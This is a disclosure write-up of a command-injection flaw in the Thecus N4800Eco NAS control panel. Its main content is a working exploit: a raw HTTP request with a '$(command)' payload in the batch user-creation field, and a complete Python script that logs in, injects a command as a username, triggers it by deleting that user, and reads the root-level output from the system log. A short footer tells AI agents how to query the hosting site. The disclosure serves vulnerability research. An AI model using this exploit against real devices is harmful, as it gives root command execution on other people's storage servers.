# Thecus N4800Eco Nas Server Control Panel Comand Injection

I have discovered command injection vulnerability on the Thecus N4800Eco Nas Server control panel during penetration test. I could not analyze source code because I didn't have enough time. Hence, I will describe only how vulnerability is detected.

### **# Description**

Firstly, I have tried to add user through *Local User Configuration*, but server didn't accept special chars such as `$)(` . Also, user and group could be created using *Batch Input* option that is under the *User and Group Authentication* section. I set Batch Content as `$(ifconfig),22222,9999` that corresponds to username, password and group name.

{% code title="Request:" %}

```
POST /adm/setmain.php?fun=setbatch HTTP/1.1
Host: target
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 42
Origin: https://target
Connection: close
Referer: https://target/adm/index.php
Cookie: select_md=0; MYSESSID=*

batch_content=%24(ifconfig)%2C22222%2C9999
```

{% endcode %}

![](https://1825299558-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MOWsiA3y7BsN5oohlsn%2F-Mai69dOirBetXp-Y_fu%2F-Mai6ExqB7i_tEhJSUb6%2F1-1.PNG?alt=media\&token=2a504bc4-0c3e-4352-a8f0-bc69741654b0)

![](https://1825299558-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MOWsiA3y7BsN5oohlsn%2F-Mai69dOirBetXp-Y_fu%2F-Mai6cPXl4ApU36QUf3W%2F2-2.PNG?alt=media\&token=5ee3753e-0d0e-4e7d-84fc-3b679616d24b)

So that filtering can be bypassed using *Batch Content*  option for adding malicious payload as username. After the user adding process, I sent second request for deleting `$(ifconfig)` user and *Local User remove succeeds* response is returned. However the user was not deleted, it is very interesting to me. I  tried to understand what happened and noticed that there is a *system log* section.&#x20;

![](https://1825299558-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MOWsiA3y7BsN5oohlsn%2F-MaiDqIRgJs4ZH9bbyen%2F-MaiFTbORc7O-jDgi_PM%2F3-1.PNG?alt=media\&token=2f3e57f1-e825-452a-80d3-9d3cf8d2a852)

![](https://1825299558-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MOWsiA3y7BsN5oohlsn%2F-MaiDqIRgJs4ZH9bbyen%2F-MaiGvM6NURXxuYReF2W%2F4-1.png?alt=media\&token=222139eb-b074-45b6-9b58-f9bcf8cca54c)

Surprisingly I saw that `ifconfig` command is executed. &#x20;

![](https://1825299558-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MOWsiA3y7BsN5oohlsn%2F-MaiKlhFI5r2BBauo8Go%2F-MaiLoSVnY0LBioSVVJC%2F8-1.PNG?alt=media\&token=e45ac954-9dcd-4c87-a071-785113cc43ee)

For verifying the command injection vulnerability i tried another command such as `id`

![](https://1825299558-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MOWsiA3y7BsN5oohlsn%2F-MaiMIoYzcA_EJNt2Fnn%2F-MaiNAKfe6a8EUpfgRX6%2F8-2.PNG?alt=media\&token=4afb5c26-b002-4b35-995b-2984875991d2)

![](https://1825299558-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MOWsiA3y7BsN5oohlsn%2F-MaiT-6iAD4WGkIDmhHI%2F-MaiUecBtiNYXyX05abI%2F8-3.PNG?alt=media\&token=06b0c494-0bc4-4ec6-b7d3-f124f7daaea3)

So there is a comman injection vulnerability that lets to execute command with `root` privilege. `Username` parameter seems to vulnerable. It is time to write basic Python script.

```python
import requests
import sys
import urllib3


# To fix SSL error that occurs when script is started.
# 1- Open /etc/ssl/openssl.cnf file
# At the bottom of the file:
# [system_default_sect]
# MinProtocol = TLSv1.2
# CipherString = DEFAULT@SECLEVEL=2
# 2- Set value of MinProtocol as TLSv1.0


def readResult(s, target):
    d = {
        "fun": "setlog",
        "action": "query",
        "params": '[{"start":0,"limit":1,"catagory":"sys","level":"all"}]'
    }
    url = "https://" + target + "/adm/setmain.php"
    resultReq = s.post(url, data=d, verify=False)
    dict = resultReq.text.split()
    print("[+] Reading system log...\n")
    #Set your command output range
    print(dict[5:8])				

def delUser(s, target, command):
    d = {
        "action": "delete",
        "username": "$("+command+")"
    }
    url = "https://" + target + "/adm/setmain.php?fun=setlocaluser"
    delUserReq = s.post(url, data=d, allow_redirects=False, verify=False)

    if 'Local User remove succeeds' in delUserReq.text:
        print('[+] %s command was executed successfully' % command)
    else:
        print('[-] %s command was not executed!' %command)
        sys.exit(1)
    readResult(s, target)

def addUser(s, target, command):
    d = {'batch_content': '%24('+command+')%2C22222%2C9999'}
    url = "https://" + target + "/adm/setmain.php?fun=setbatch"
    addUserReq = s.post(url, data=d, allow_redirects=False, verify=False)

    if 'Users and groups were created successfully.' in addUserReq.text:
        print('[+] Users and groups were created successfully')
    else:
        print('[-] Users and groups were not created')
        sys.exit(1)
    delUser(s, target, command)

def login(target, username, password, command=None):
    urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
    s = requests.Session()
    d = {
        "&eplang": "english",
        "p_pass": password,
        "p_user": username,
        "username": username,
        "pwd": password,
        "action": "login",
        "option": "com_extplorer"
    }
    url = "https://" + target + "/adm/login.php"
    loginReq = s.post(url, data=d, allow_redirects=False, verify=False)

    if '"success":true' in loginReq.text:
        print('[+] Authentication successful')
    elif '"success":false' in loginReq.text:
        print('[-] Authentication failed!')
        sys.exit(1)
    else:
        print('[-] Something went wrong!')
        sys.exit(1)
    addUser(s, target, command)

def main(args):
    if len(args) != 5:
        print("usage: %s targetIp:port username password command" % (args[0]))
        print("Example 192.168.1.13:80 admin admin id")
        sys.exit(1)
    login(target=args[1], username=args[2], password=args[3], command=args[4])


if __name__ == "__main__":
    main(args=sys.argv)
```

{% embed url="<https://www.youtube.com/watch?v=jf_eVWd3A0E>" %}

<pre><code><strong># Author: Metin Yunus Kandemir
</strong></code></pre>


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://docs.unsafe-inline.com/0day/thecus-n4800eco-nas-server-control-panel-comand-injection.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.